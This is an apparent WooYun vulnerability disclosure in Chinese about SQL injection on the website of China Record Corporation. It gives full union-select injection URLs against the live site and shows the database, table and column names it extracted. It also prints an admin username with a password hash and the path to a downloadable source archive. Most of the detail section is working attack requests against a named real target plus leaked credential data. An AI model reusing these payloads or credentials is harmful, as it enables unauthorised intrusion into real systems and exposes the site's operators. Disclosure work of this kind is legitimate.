漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2014-12-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-29: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
中国唱片总公司,是中国规模最大、历史最悠久的国家级音像出版集团。公司总部设在北京。 五十多年来,中国唱片总公司肩负着国家唱片业导向的神圣职责和庄严使命,依托先进的专业技术设备和优秀的艺术技术人才,为700多家文艺团体、4000多位艺术家录制了唱片、录音带、录像带、光盘类节目计53000多片(盒)号,总销量达10亿张(盒),产品销售遍布全国(含港、澳、台地区)。记录和传播了大量优秀的音乐、歌曲、戏曲、曲艺等作品。积累和珍藏了12万唱片模板(母版),包括一批极具历史价值的旷世孤品和艺术典藏。
详细说明:
注入点http://www.china-crc.com.cn/index.php/news/detail/pid/03/articleid/431
网站把?和=进行了过滤。全部变成了/ 下面我来进行手注。这是一个php+mysql的网站
先 order by 29报错 order by 28 返回正确
http://www.china-crc.com.cn/index.php/news/detail/pid/03/articleid/431%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20information_schema.SCHEMATA
页面返回6和11
接下来爆数据库
http://www.china-crc.com.cn/index.php/news/detail/pid/03/articleid/428%20and%201=2%20union%20select%201,2,3,4,5,SCHEMA_NAME,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%20from%20information_schema.SCHEMATA%20limit%201,1--
数据库名为
chinacrc
......然后爆表名最后字段。。
最终手注的结果如下
数据库:
chinacrc
chinacrc表
smt_user
smt_user表
userid
userpwd
用户名 admin 密码 120b0d5e0100
然后我在找后台的途中,发现网站可下整站源码http://www.china-crc.com.cn/web.zip
漏洞证明:
如上
修复方案:
修复注入点。并不要暴露源码
版权声明:转载请注明来源 路人甲@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝